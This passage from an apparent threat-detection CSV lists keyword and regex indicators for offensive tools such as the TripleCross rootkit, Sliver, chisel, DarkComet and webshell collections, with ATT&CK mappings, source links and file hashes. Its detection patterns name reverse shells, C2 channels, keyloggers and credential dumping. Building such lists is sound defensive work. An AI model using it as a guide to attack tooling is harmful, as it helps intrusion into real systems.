T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","33154" "*Activate all of rootkit's hooks*",".{0,1000}Activate\sall\sof\srootkit\'s\shooks.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33165" 
"*activate_command_control_shell(*",".{0,1000}activate_command_control_shell\(.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33167" "*activate_command_control_shell_encrypted(*",".{0,1000}activate_command_control_shell_encrypted\(.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33168" "*Activated COMMAND & CONTROL encrypted shell*",".{0,1000}Activated\sCOMMAND\s\&\sCONTROL\sencrypted\sshell.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33169" "*Activated COMMAND & CONTROL shell*",".{0,1000}Activated\sCOMMAND\s\&\sCONTROL\sshell.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth 
capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33170" "*Activating COMMAND & CONTROL with MULTI-PACKET backdoor trigger*",".{0,1000}Activating\sCOMMAND\s\&\sCONTROL\swith\sMULTI\-PACKET\sbackdoor\strigger.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33171" "*activedirectory/pwns.go*",".{0,1000}activedirectory\/pwns\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33172" "*ActiveMQ-RCE -i *",".{0,1000}ActiveMQ\-RCE\s\-i\s.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","0","N/A","N/A","9","2","114","39","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z","33173" "*ActiveMQ-RCE.exe*",".{0,1000}ActiveMQ\-RCE\.exe.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - 
T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","N/A","9","2","114","39","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z","33174" "*ActiveOfflineKeylogger*",".{0,1000}ActiveOfflineKeylogger.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","33175" "*ActiveOnlineKeylogger*",".{0,1000}ActiveOnlineKeylogger.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","33176" "*ActiveOnlineKeyStrokes*",".{0,1000}ActiveOnlineKeyStrokes.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","33177" 
"*ACTIVEREMOTESHELL*",".{0,1000}ACTIVEREMOTESHELL.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","33178" "*activeScan++.py*",".{0,1000}activeScan\+\+\.py.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","network exploitation tool","7","7","630","195","2025-04-17T10:47:54Z","2014-06-23T10:04:13Z","33179" "*AD LDAP Command Line Searching that doesn't suck.*",".{0,1000}AD\sLDAP\sCommand\sLine\sSearching\sthat\sdoesn\'t\ssuck\..{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","33180" "*AD Privesc Automation*",".{0,1000}AD\sPrivesc\sAutomation.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","33181" 
"*ad_dns_dump.txt*",".{0,1000}ad_dns_dump\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","33182" "*AD_Enumeration_Hunt.ps1*",".{0,1000}AD_Enumeration_Hunt\.ps1.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","AD Enumeration","7","1","93","18","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z","33183" "*AD_Enumeration_Hunt-alperen_ugurlu_hack*",".{0,1000}AD_Enumeration_Hunt\-alperen_ugurlu_hack.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","AD Enumeration","7","1","93","18","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z","33184" "*ad_miner.sources.modules.*",".{0,1000}ad_miner\.sources\.modules\..{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","33185" "*AD_Miner-main*",".{0,1000}AD_Miner\-main.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","33186" "*AD0067D9-4AF6-47C2-B0C3-D768A9624002*",".{0,1000}AD0067D9\-4AF6\-47C2\-B0C3\-D768A9624002.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","33187" "*ad042ec9afbf29b4b962820a1e82f4d1d6a8c654c42f3c55d6e562dc7a279766*",".{0,1000}ad042ec9afbf29b4b962820a1e82f4d1d6a8c654c42f3c55d6e562dc7a279766.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","33188" "*ad1117e7a6d3284f9ddc7f8ec841f72b759932d1467cffd9633af242f8f00798*",".{0,1000}ad1117e7a6d3284f9ddc7f8ec841f72b759932d1467cffd9633af242f8f00798.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - 
T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33190" "*ad12dd2d23a3fdaa017293fe0acb1d6b60503d86c05b7b4e94e93df8beb1a347*",".{0,1000}ad12dd2d23a3fdaa017293fe0acb1d6b60503d86c05b7b4e94e93df8beb1a347.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33191" "*ad1e96ef3defc771763f6f6475dc020d543b9712d067aa63ab95ad56a934c5fd*",".{0,1000}ad1e96ef3defc771763f6f6475dc020d543b9712d067aa63ab95ad56a934c5fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33194" 
"*ad1fdf36f0f9507ddfe59e2dcab4ee246be5c9ddfb674107bf313c21655d4b0c*",".{0,1000}ad1fdf36f0f9507ddfe59e2dcab4ee246be5c9ddfb674107bf313c21655d4b0c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33195" "*ad23cc7c081e18f568ba1aef36bf1002d296bee1cb3ccec0958f328cf97dbe27*",".{0,1000}ad23cc7c081e18f568ba1aef36bf1002d296bee1cb3ccec0958f328cf97dbe27.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33196" "*AD240C26-717F-4937-A4CD-5827BDC315E6*",".{0,1000}AD240C26\-717F\-4937\-A4CD\-5827BDC315E6.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","33197" "*ad32bf0a043b3ec5c05f0a10ad724113bffa7a2871bac8defe8538322a2129f9*",".{0,1000}ad32bf0a043b3ec5c05f0a10ad724113bffa7a2871bac8defe8538322a2129f9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33199" "*ad32cb154c001fea9cedc23a2773ab62bc4d43491aea1060454713e396af5582*",".{0,1000}ad32cb154c001fea9cedc23a2773ab62bc4d43491aea1060454713e396af5582.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33200" "*ad393f135cc101f7897812ad3183775a89853e89cab5f31ae89eef3240ca9c4f*",".{0,1000}ad393f135cc101f7897812ad3183775a89853e89cab5f31ae89eef3240ca9c4f.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","#filehash","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","33201" "*ad3d435b6a93f157946e1e33b7f9e0beff6deffcba00a182a17386ef42f1d7e7*",".{0,1000}ad3d435b6a93f157946e1e33b7f9e0beff6deffcba00a182a17386ef42f1d7e7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33203" "*AD495F95-007A-4DC1-9481-0689CA0547D9*",".{0,1000}AD495F95\-007A\-4DC1\-9481\-0689CA0547D9.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/D4stiny/ForkPlayground","1","0","#GUIDproject","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","33204" "*ad50106f03dc12f69b15eab5dd76a917b4200f3d02e7f25929d6194a5da965fb*",".{0,1000}ad50106f03dc12f69b15eab5dd76a917b4200f3d02e7f25929d6194a5da965fb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33206" "*ad50d7d93bf5ae78bc0115093854d68da5256942bdf2169f8832eb72ff3d8b74*",".{0,1000}ad50d7d93bf5ae78bc0115093854d68da5256942bdf2169f8832eb72ff3d8b74.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33207" "*ad577ef615bc0658fcb17bbb64afc2b7a3f487cd1eb7c2b673357d1df622fa78*",".{0,1000}ad577ef615bc0658fcb17bbb64afc2b7a3f487cd1eb7c2b673357d1df622fa78.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33208" "*ad58073b97609066a7a55c5b880a23f0986e49e36588ecc68a4f62c29d03b1b1*",".{0,1000}ad58073b97609066a7a55c5b880a23f0986e49e36588ecc68a4f62c29d03b1b1.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","33209" "*ad5c08c647f8042f9d4a29581f2c740bb0634404f140cb585ad8175376adaa64*",".{0,1000}ad5c08c647f8042f9d4a29581f2c740bb0634404f140cb585ad8175376adaa64.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","33210" "*ad690f3c67428e406d7e39e38b1e7c0569eaec1cd488a3f81c49048e9758cdf6*",".{0,1000}ad690f3c67428e406d7e39e38b1e7c0569eaec1cd488a3f81c49048e9758cdf6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33214" 
"*ad6e6b33e48ec8da3e59868731d700938add9cbe26687e1555028a04233a4f43*",".{0,1000}ad6e6b33e48ec8da3e59868731d700938add9cbe26687e1555028a04233a4f43.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33215" "*ad710c24d6097ad20bf1bbda621f02d5b7410730ab4b08395cee96276f5f8bf7*",".{0,1000}ad710c24d6097ad20bf1bbda621f02d5b7410730ab4b08395cee96276f5f8bf7.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","33216" "*ad7136daff93312ebb41fe388da46d2814ab6504e23b3c90b2a56a0426a558e3*",".{0,1000}ad7136daff93312ebb41fe388da46d2814ab6504e23b3c90b2a56a0426a558e3.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#filehash","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","33217" "*ad76055ffa760f3aac8cf5dca9e2380246abb919484b28ed8d5c2ca1a6066e31*",".{0,1000}ad76055ffa760f3aac8cf5dca9e2380246abb919484b28ed8d5c2ca1a6066e31.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - 
TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33218" "*ad7e24d0f08fbea59de51b1b3e0212dbe394572856b833bffaa215f9abb7bb96*",".{0,1000}ad7e24d0f08fbea59de51b1b3e0212dbe394572856b833bffaa215f9abb7bb96.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33219" "*ad86a839998173ce0349e06fcf1afe4c494490d071d10a3486671b03f0846485*",".{0,1000}ad86a839998173ce0349e06fcf1afe4c494490d071d10a3486671b03f0846485.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33220" "*ad89fdf30b1ffef5cdf285079f018969976d37a143e19bce810c6b234a8f58c0*",".{0,1000}ad89fdf30b1ffef5cdf285079f018969976d37a143e19bce810c6b234a8f58c0.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","33221" "*ad8aa2a15aa507d1d9231c4c5ebaa93501fe32c56d287e83c8f7197d4e15b546*",".{0,1000}ad8aa2a15aa507d1d9231c4c5ebaa93501fe32c56d287e83c8f7197d4e15b546.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also 
known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","33222" "*ad8f8790854a70fc8a3f5d53931d0e56a2ff0f037cf781fccfabcb4334d817be*",".{0,1000}ad8f8790854a70fc8a3f5d53931d0e56a2ff0f037cf781fccfabcb4334d817be.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","33223" "*ad94977a2d07c55c4b2106b47bd640ebc9ed21c8883a69a998604a4b4109288b*",".{0,1000}ad94977a2d07c55c4b2106b47bd640ebc9ed21c8883a69a998604a4b4109288b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33225" "*ad953b6731c27ada2c6c7dfd14aca6f46218b962db4272a5c042e4259dacb2e3*",".{0,1000}ad953b6731c27ada2c6c7dfd14aca6f46218b962db4272a5c042e4259dacb2e3.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense 